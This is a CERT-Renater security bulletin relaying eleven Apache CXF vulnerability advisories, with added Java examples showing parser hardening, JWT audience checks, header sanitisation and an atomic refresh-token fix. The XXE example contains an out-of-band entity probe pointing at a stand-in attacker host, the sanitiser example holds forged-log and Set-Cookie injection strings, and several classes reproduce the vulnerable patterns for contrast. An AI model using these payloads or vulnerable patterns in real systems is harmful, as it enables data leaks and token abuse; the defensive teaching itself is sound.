=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN624
_____________________________________________________________________

DATE                : 12/06/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Apache CXF 4.2.0 or 4.2.1, or any version before 4.1.7 (fixed in 4.2.2 and 4.1.7).

=====================================================================
https://lists.apache.org/thread/j2rypk0cvpo7w1282lopkc55qs6nwh06
https://lists.apache.org/thread/ny622fjco9csybhmjwfgwmpl385hbpxd
https://lists.apache.org/thread/7hl8kgo2c4htykbsv4onmsj1c91wg0pg
https://lists.apache.org/thread/dfc9fzc3zmhk1kgyxqcf3vkgxl4lpr90
https://lists.apache.org/thread/bf9w75mvw499pqlw1lsgcoq74wfrbyly
https://lists.apache.org/thread/ocv1s2xymgqr3x4xyb9xyyprlzgkmf85
https://lists.apache.org/thread/fdk6t2ygpvdqfocfzt4f48nqhqdp6w9s
https://lists.apache.org/thread/x1z43st65ch7pw3ok6fw8rvcklykppgl
https://lists.apache.org/thread/xl3pkgobn8fd1cx78nlk60qqo1z1d468
https://lists.apache.org/thread/vfwfw7ky0z0pb0l3dtxf1g9d36j1pxgd
https://lists.apache.org/thread/jyw8opqthpb419vvq9bgp1ccfm0771dc
_____________________________________________________________________

CVE-2026-49875: Apache CXF: XML External Entity (XXE) Injection in
W3CMultiSchemaFactory and EndpointReferenceUtils

Severity: important 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-core) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-core) before 4.1.7

Description:

Apache CXF's EndpointReferenceUtils and W3CMultiSchemaFactory classes
construct a SAXParserFactory without the necessary JAXP hardening
settings (DTD and external entity resolution left enabled). An XML
document handed to these classes can therefore trigger out-of-band (OOB)
external entity resolution, i.e. the parser contacts an attacker-chosen
URL. Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which
fix this issue.
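
As an added example (not code from the Apache CXF project or from this advisory), the following Java class shows the JAXP hardening the description refers to: a SAXParserFactory with DOCTYPE declarations, external entities and external DTD loading disabled, fed a constructed document containing the kind of external parameter entity used for an out-of-band probe. The class name, the probe document and the placeholder host attacker.invalid are assumptions made for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class SaxHardeningDemo {

    // Constructed test document (an assumption for this example): it declares an
    // external parameter entity that an unhardened parser would fetch from an
    // attacker-chosen URL, which is the classic out-of-band XXE probe.
    private static final String OOB_PROBE =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE x [\n"
      + "  <!ENTITY % remote SYSTEM \"http://attacker.invalid/probe.dtd\">\n"
      + "  %remote;\n"
      + "]>\n"
      + "<x>hello</x>";

    /** The unsafe pattern: a factory with JAXP defaults, which resolve DTDs and entities. */
    public static SAXParserFactory unhardenedFactory() {
        return SAXParserFactory.newInstance();
    }

    /** Hardened factory: no DOCTYPE, no external entities, no external DTD, no XInclude. */
    public static SAXParserFactory hardenedFactory() throws ParserConfigurationException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        try {
            // Rejecting the DOCTYPE outright is the strongest single control.
            f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Belt and braces for parsers that do not honour the feature above.
            f.setFeature("http://xml.org/sax/features/external-general-entities", false);
            f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
            f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        } catch (SAXException e) {
            // A parser that cannot be hardened must not be used at all.
            throw new ParserConfigurationException("parser does not support required features: " + e);
        }
        f.setXIncludeAware(false);
        f.setNamespaceAware(true);
        return f;
    }

    /** Parses the document with the given factory; returns true if the parser accepted it. */
    public static boolean accepts(SAXParserFactory factory, String xml) {
        try {
            SAXParser parser = factory.newSAXParser();
            parser.parse(new InputSource(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8))),
                         new DefaultHandler());
            return true;
        } catch (SAXException | IOException | ParserConfigurationException e) {
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        // With the hardened factory the DOCTYPE is rejected before any entity is
        // resolved, so no network request is ever attempted.
        System.out.println("hardened factory accepts probe: " + accepts(hardenedFactory(), OOB_PROBE));
    }
}
```

Only the hardened factory is exercised in main: with JAXP defaults the parser would try to fetch http://attacker.invalid/probe.dtd, and that connection attempt is the out-of-band leak even though the parse itself then fails. When auditing, check every SAXParserFactory, DocumentBuilderFactory and XMLInputFactory construction for these settings rather than relying on the defaults.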

Credit:

Venkatraman Kumar (r3dw0lfsec), Securin (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-49875

_____________________________________________________________________

CVE-2026-50627: Apache CXF: OAuth2: Missing JWT Audience and Issuer
Validation in Access Token Validator

Severity: important 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

The JwtAccessTokenValidator class in Apache CXF does not validate the
'aud' (audience) claim of incoming JWT access tokens (the advisory title
also names issuer validation). A JWT issued for one Resource Server can
therefore be replayed successfully against a completely different
Resource Server, a token confusion (token routing) attack. Users are
recommended to upgrade to versions 4.2.2 or 4.1.7, which fix this issue.

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50627

_____________________________________________________________________

CVE-2026-50628: Apache CXF: OAuth2: Inverted IP Binding Check Defeats
Security Control

Severity: important 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

A logic error in OAuthRequestFilter rejects legitimate requests
originating from the bound IP address while allowing requests from any
other IP address. Enabling this security feature therefore inverts the
intended check: the only client that is blocked is the one the token was
bound to. Users are recommended to upgrade to versions 4.2.2 or 4.1.7,
which fix this issue.
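
The two descriptions above (missing audience and issuer validation, and the inverted IP-binding check) both concern checks a resource server makes before accepting an access token. As an added illustration written for this note, not CXF's own implementation, the following Java class validates a JWT claim set against an expected issuer and audience, handling both shapes RFC 7519 allows for 'aud', and places the correct IP-binding comparison beside the inverted one the advisory describes. The class, the claim maps, the issuer and audience strings and the IP addresses are constructed for the example; JWT parsing and signature verification are assumed to have happened beforehand.

```java
import java.time.Instant;
import java.util.Arrays;
import java.util.Collection;
import java.util.HashMap;
import java.util.Map;

public class AccessTokenChecks {

    private final String expectedIssuer;    // the only authorization server we trust
    private final String expectedAudience;  // this resource server's identifier in 'aud'

    public AccessTokenChecks(String expectedIssuer, String expectedAudience) {
        this.expectedIssuer = expectedIssuer;
        this.expectedAudience = expectedAudience;
    }

    /**
     * Accepts an already signature-verified claim set only if it was issued by the
     * expected issuer, has not expired, and names this resource server in 'aud'.
     */
    public boolean isValidFor(Map<String, Object> claims, Instant now) {
        if (!expectedIssuer.equals(claims.get("iss"))) {
            return false; // minted by some other authorization server
        }
        Object exp = claims.get("exp");
        if (!(exp instanceof Number) || now.getEpochSecond() >= ((Number) exp).longValue()) {
            return false; // missing or past expiry
        }
        return audienceContains(claims.get("aud"), expectedAudience);
    }

    /** 'aud' may be a single string or an array of strings; a missing claim is a rejection. */
    static boolean audienceContains(Object aud, String expected) {
        if (aud instanceof String) {
            return expected.equals(aud);
        }
        if (aud instanceof Collection) {
            return ((Collection<?>) aud).contains(expected);
        }
        return false;
    }

    /** Correct binding check: the request must come from the address the token was bound to. */
    public static boolean ipBindingSatisfied(String boundIp, String requestIp) {
        if (boundIp == null) {
            return true; // this token was never bound, so the feature does not apply
        }
        return boundIp.equals(requestIp);
    }

    /** The inverted logic the advisory describes: only the legitimate address is refused. Do not use. */
    public static boolean ipBindingInverted(String boundIp, String requestIp) {
        return boundIp == null || !boundIp.equals(requestIp);
    }

    public static void main(String[] args) {
        // Constructed claim sets (assumptions): rs-b must refuse a token minted for rs-a.
        AccessTokenChecks rsB = new AccessTokenChecks("https://as.example", "rs-b");
        Map<String, Object> tokenForA = new HashMap<>();
        tokenForA.put("iss", "https://as.example");
        tokenForA.put("aud", "rs-a");
        tokenForA.put("exp", Instant.now().getEpochSecond() + 600);

        Map<String, Object> tokenForBoth = new HashMap<>(tokenForA);
        tokenForBoth.put("aud", Arrays.asList("rs-a", "rs-b"));

        System.out.println("rs-b accepts token for rs-a:  " + rsB.isValidFor(tokenForA, Instant.now()));
        System.out.println("rs-b accepts token for both:  " + rsB.isValidFor(tokenForBoth, Instant.now()));
        System.out.println("bound 10.0.0.5, from 10.0.0.5 (correct):     " + ipBindingSatisfied("10.0.0.5", "10.0.0.5"));
        System.out.println("bound 10.0.0.5, from 10.0.0.5 (inverted):    " + ipBindingInverted("10.0.0.5", "10.0.0.5"));
        System.out.println("bound 10.0.0.5, from 203.0.113.9 (inverted): " + ipBindingInverted("10.0.0.5", "203.0.113.9"));
    }
}
```

The token minted for rs-a is rejected by rs-b, while the token whose 'aud' array lists both servers is accepted; with the inverted comparison the bound client is the one refused and every other address passes, which is exactly the failure mode of CVE-2026-50628.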

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50628

_____________________________________________________________________

CVE-2026-50633: Apache CXF: JNDI Injection vulnerability in
DispatchMDBMessageListenerImpl

Severity: important 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-integration-jca) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-integration-jca) before 4.1.7

Description:

A JNDI Injection vulnerability has been discovered in Apache CXF's
JCA integration module, which can allow code execution if an
attacker is able to manipulate the JCA deployment descriptor (ra.xml)
or runtime activation parameters. Users are recommended to upgrade
to versions 4.2.2 or 4.1.7, which fix this issue.

Credit:

Venkatraman Kumar (r3dw0lfsec), Securin (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50633

_____________________________________________________________________

CVE-2026-50634: Apache CXF: WS JSON request filter trusts metadata
from an unvalidated first signature entry

Severity: important 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-jose-jaxrs) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-jose-jaxrs) before 4.1.7

Description:

A vulnerability in Apache CXF's JwsJsonContainerRequestFilter can be
exploited to cause CXF to process metadata that was not authenticated
by the accepted signature. This breaks the application's assumption
that the accepted `Content-Type` or protected HTTP-header metadata came
from a verified signature entry, and may steer downstream JAX-RS entity
parsing or signed-header consistency checks. Users are recommended to
upgrade to versions 4.2.2 or 4.1.7, which fix this issue.
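
As an added example for the JWS JSON issue above (not CXF's JwsJsonContainerRequestFilter), the following Java class models a JWS JSON Serialization with several signature entries. It contrasts the vulnerable pattern, which accepts the message if any entry verifies but reads the protected header (here the 'cty' content type) from the first entry, with the fixed pattern that takes metadata only from the entry whose signature actually verified. HS256 with a constructed key, the two headers, the payload and the small entry class are assumptions made for the example.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class JwsJsonEntrySelection {

    /** One element of the "signatures" array of a JWS JSON Serialization (RFC 7515, 7.2.1). */
    public static final class SignatureEntry {
        final String protectedB64; // base64url(protected header JSON)
        final byte[] signature;
        SignatureEntry(String protectedB64, byte[] signature) {
            this.protectedB64 = protectedB64;
            this.signature = signature;
        }
    }

    private static final Base64.Encoder B64 = Base64.getUrlEncoder().withoutPadding();
    private static final Base64.Decoder B64D = Base64.getUrlDecoder();

    static String b64(String s) {
        return B64.encodeToString(s.getBytes(StandardCharsets.UTF_8));
    }

    static byte[] hmac(byte[] key, String signingInput) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));
        return mac.doFinal(signingInput.getBytes(StandardCharsets.US_ASCII));
    }

    /** HS256 over the JWS Signing Input, which covers this entry's own protected header. */
    static boolean verifies(SignatureEntry e, String payloadB64, byte[] key) throws Exception {
        byte[] expected = hmac(key, e.protectedB64 + "." + payloadB64);
        return MessageDigest.isEqual(expected, e.signature);
    }

    /** Vulnerable pattern: accept if any entry verifies, but read metadata from entries.get(0). */
    public static String vulnerableProtectedHeader(String payloadB64, List<SignatureEntry> entries,
                                                   byte[] key) throws Exception {
        boolean anyValid = false;
        for (SignatureEntry e : entries) {
            anyValid |= verifies(e, payloadB64, key);
        }
        if (!anyValid) {
            return null;
        }
        return new String(B64D.decode(entries.get(0).protectedB64), StandardCharsets.UTF_8);
    }

    /** Fixed pattern: metadata comes only from the entry whose signature was verified. */
    public static String verifiedProtectedHeader(String payloadB64, List<SignatureEntry> entries,
                                                 byte[] key) throws Exception {
        for (SignatureEntry e : entries) {
            if (verifies(e, payloadB64, key)) {
                return new String(B64D.decode(e.protectedB64), StandardCharsets.UTF_8);
            }
        }
        return null;
    }

    public static void main(String[] args) throws Exception {
        // Constructed key, payload and headers (assumptions for this example).
        byte[] key = "constructed-demo-key-not-for-real-use".getBytes(StandardCharsets.UTF_8);
        String payloadB64 = b64("{\"order\":42}");

        // Legitimate entry produced by the key holder.
        String goodHdr = b64("{\"alg\":\"HS256\",\"cty\":\"application/json\"}");
        SignatureEntry good = new SignatureEntry(goodHdr, hmac(key, goodHdr + "." + payloadB64));

        // Attacker-prepended entry: forged header naming a different content type, garbage signature.
        String forgedHdr = b64("{\"alg\":\"HS256\",\"cty\":\"application/xml\"}");
        SignatureEntry forged = new SignatureEntry(forgedHdr, new byte[32]);

        List<SignatureEntry> entries = new ArrayList<>();
        entries.add(forged);
        entries.add(good);

        System.out.println("vulnerable selection: " + vulnerableProtectedHeader(payloadB64, entries, key));
        System.out.println("verified selection:   " + verifiedProtectedHeader(payloadB64, entries, key));
    }
}
```

Both functions accept the message, because the second entry carries a valid signature; only the fixed one returns the header that was actually signed. The rule to carry into any multi-signature JWS handling is that the entry that verified and the entry whose metadata is consumed must be the same object.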

Credit:

Mitchell Benjamin / Revamp Studio. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50634

_____________________________________________________________________

CVE-2026-50632: Apache CXF: JNDI Injection Vulnerability in
JMSConfigFactory

Severity: moderate 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-transports-jms) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-transports-jms) before 4.1.7

Description:

The fix shipped for the earlier advisory CVE-2026-44417 (Untrusted JMS
configuration can lead to RCE) in Apache CXF has been found to be
incomplete: untrusted users who are allowed to configure JMS for
Apache CXF can still obtain code execution. Users are recommended to
upgrade to versions 4.2.2 or 4.1.7, which fix this issue.

Credit:

Venkatraman Kumar (r3dw0lfsec), Securin (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50632

_____________________________________________________________________

CVE-2026-50623: Apache CXF: Authentication Bypass in OAuth2
TokenIntrospectionService

Severity: moderate 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

An authentication bypass vulnerability exists in the OAuth2
TokenIntrospectionService in Apache CXF. Because of a missing 'throw'
keyword in the security context check, the exception meant to reject an
unauthenticated caller is constructed but never thrown, so the
introspection endpoint (/services/oauth2/introspect) can be reached by
any unauthenticated network attacker. Note, however, that this check is
only a safeguard for the case where authentication was not enabled on
the service. Users are recommended to upgrade to versions 4.2.2 or
4.1.7, which fix this issue.

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50623

_____________________________________________________________________

CVE-2026-50629: Apache CXF: OAuth2: Log Injection via Unsanitized
Client Identifier

Severity: low 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

The 'clientId' parameter from incoming HTTP requests is concatenated
directly into OAuth2 server log warning messages without sanitizing
control characters. This allows an attacker to inject arbitrary
content, including fake log entries, into the server's log files.
Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which
fix this issue.

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50629


_____________________________________________________________________

CVE-2026-50630: Apache CXF: OAuth2: HTTP Response Splitting via
WWW-Authenticate Realm Injection

Severity: low 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

A CRLF injection vulnerability exists in the OAuth2 AuthorizationUtils
class. When constructing the WWW-Authenticate response header, the 'realm'
parameter is concatenated without sanitizing Carriage Return (CR) and
Line Feed (LF) characters. If an attacker can control the realm value,
they can inject arbitrary HTTP headers or split the HTTP response entirely.
Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which fix
this issue.
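
As an added example covering both the log injection (CVE-2026-50629) and the WWW-Authenticate realm injection (CVE-2026-50630) described above, the following Java class shows the two sanitisation choices a practitioner would want: escaping control characters so an attacker-supplied clientId cannot forge log lines, and refusing CR, LF and other controls in a realm before it is placed into a header. The class, the sample clientId and the realm values are constructed for illustration; none of this is CXF code.

```java
public class HeaderAndLogSanitizer {

    /** Escapes control characters so an attacker-supplied value occupies exactly one log line. */
    public static String forLog(String value) {
        if (value == null) {
            return "null";
        }
        StringBuilder sb = new StringBuilder(value.length() + 8);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '\r': sb.append("\\r"); break;
                case '\n': sb.append("\\n"); break;
                case '\t': sb.append("\\t"); break;
                default:
                    if (c < 0x20 || c == 0x7f) {
                        sb.append(String.format("\\u%04x", (int) c)); // any other C0 control or DEL
                    } else {
                        sb.append(c);
                    }
            }
        }
        return sb.toString();
    }

    /**
     * Renders the realm as an RFC 7235 quoted-string. CR, LF and every other control
     * character are rejected outright (stricter than the qdtext grammar, which tolerates
     * HTAB); '"' and '\' are escaped as the quoted-string grammar requires.
     */
    public static String realmQuotedString(String realm) {
        if (realm == null) {
            throw new IllegalArgumentException("realm is required");
        }
        StringBuilder sb = new StringBuilder("\"");
        for (int i = 0; i < realm.length(); i++) {
            char c = realm.charAt(i);
            if (c < 0x20 || c == 0x7f) {
                throw new IllegalArgumentException("control character in realm at index " + i);
            }
            if (c == '"' || c == '\\') {
                sb.append('\\');
            }
            sb.append(c);
        }
        return sb.append('"').toString();
    }

    /** Builds the challenge header value from a validated realm. */
    public static String wwwAuthenticate(String realm) {
        return "Bearer realm=" + realmQuotedString(realm);
    }

    public static void main(String[] args) {
        // Constructed inputs mimicking what an attacker would send (assumptions for this example).
        String clientId = "good-client\n2026-06-12 WARN OAuthRequestFilter: client admin authenticated";
        System.out.println("raw:       " + clientId);
        System.out.println("sanitised: " + forLog(clientId));

        System.out.println(wwwAuthenticate("api \"v2\""));
        try {
            wwwAuthenticate("x\r\nSet-Cookie: session=attacker");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The raw clientId prints as two lines, the second of which looks like a genuine filter warning; the escaped form keeps the whole value on one line so log parsers and humans see one event. For the realm, rejecting rather than escaping is the right choice: there is no legitimate realm that contains a control character, and a rejected value cannot terminate the header.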

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50630

_____________________________________________________________________

CVE-2026-50631: Apache CXF: OAuth2: TOCTOU Race Condition in Refresh
Token Processing

Severity: low 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-rt-rs-security-oauth2) before 4.1.7

Description:

A race condition in AbstractOAuthDataProvider allows concurrent requests
using the same Refresh Token to bypass single-use semantics and obtain
multiple valid Access Tokens when 'recycleRefreshTokens' is set to false.
A leaked refresh token can thus be replayed concurrently by multiple
attackers or threads. Users are recommended to upgrade to versions 4.2.2
or 4.1.7, which fix this issue.
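
As an added example (not code from CXF's AbstractOAuthDataProvider), the Java class below reproduces the check-then-use race on a refresh-token store and shows the single atomic removal that closes it, then fires concurrent exchanges of one leaked token against each version and counts how many access tokens are handed out. The store, the token strings and the thread count are assumptions made for the example.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;
import java.util.concurrent.atomic.AtomicInteger;

public class RefreshTokenStore {

    private final Map<String, String> refreshTokens = new ConcurrentHashMap<>(); // token -> clientId
    private final AtomicInteger issued = new AtomicInteger();

    public void store(String refreshToken, String clientId) {
        refreshTokens.put(refreshToken, clientId);
    }

    /** TOCTOU: the existence check and the removal are separate steps, so several threads can pass the check. */
    public String exchangeRacy(String refreshToken) {
        if (!refreshTokens.containsKey(refreshToken)) {
            return null;                                  // check
        }
        Thread.yield();                                   // stands in for validation work done between check and use
        refreshTokens.remove(refreshToken);               // use
        return "access-token-" + issued.incrementAndGet();
    }

    /** Fixed: consume the refresh token in one atomic operation; only the thread that removed it wins. */
    public String exchangeAtomic(String refreshToken) {
        String clientId = refreshTokens.remove(refreshToken);
        if (clientId == null) {
            return null;
        }
        return "access-token-" + issued.incrementAndGet();
    }

    /** Fires `threads` concurrent exchanges of the same leaked token and counts how many got an access token. */
    public static int concurrentExchanges(RefreshTokenStore store, boolean atomic, int threads) throws Exception {
        store.store("rt-leaked", "client-1");
        ExecutorService pool = Executors.newFixedThreadPool(threads);
        CountDownLatch start = new CountDownLatch(1);
        List<Future<String>> results = new ArrayList<>();
        for (int i = 0; i < threads; i++) {
            results.add(pool.submit(() -> {
                start.await(); // release all threads at once to maximise contention
                return atomic ? store.exchangeAtomic("rt-leaked") : store.exchangeRacy("rt-leaked");
            }));
        }
        start.countDown();
        int successes = 0;
        for (Future<String> f : results) {
            if (f.get() != null) {
                successes++;
            }
        }
        pool.shutdown();
        return successes;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("racy:   " + concurrentExchanges(new RefreshTokenStore(), false, 32)
                           + " access tokens from one refresh token");
        System.out.println("atomic: " + concurrentExchanges(new RefreshTokenStore(), true, 32)
                           + " access token(s) from one refresh token");
    }
}
```

The racy count is timing dependent and may come out as 1 on a lightly loaded machine, which is why this class of bug survives testing; the atomic version hands out exactly one access token however many threads race, because ConcurrentHashMap.remove is the only point at which the token is checked. In a database-backed provider the equivalent is a single conditional DELETE or UPDATE whose affected-row count is checked, not a SELECT followed by a DELETE.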

Credit:

Guanping Zhang reported this vulnerability. (finder)

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50631

_____________________________________________________________________

CVE-2026-50645: Apache CXF: No restriction on attachment headers per
message

Severity: low 

Affected versions:

- Apache CXF (org.apache.cxf:cxf-core) 4.2.0 before 4.2.2
- Apache CXF (org.apache.cxf:cxf-core) before 4.1.7

Description:

There is no restriction on the number of attachment headers that a
message can contain when being deserialized by Apache CXF, which can
lead to uncontrolled resource consumption or a denial of service attack.
Users are recommended to upgrade to versions 4.2.2 or 4.1.7, which
fix this issue by imposing a default maximum of 500 attachments per
message.

References:

https://cxf.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-50645


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================
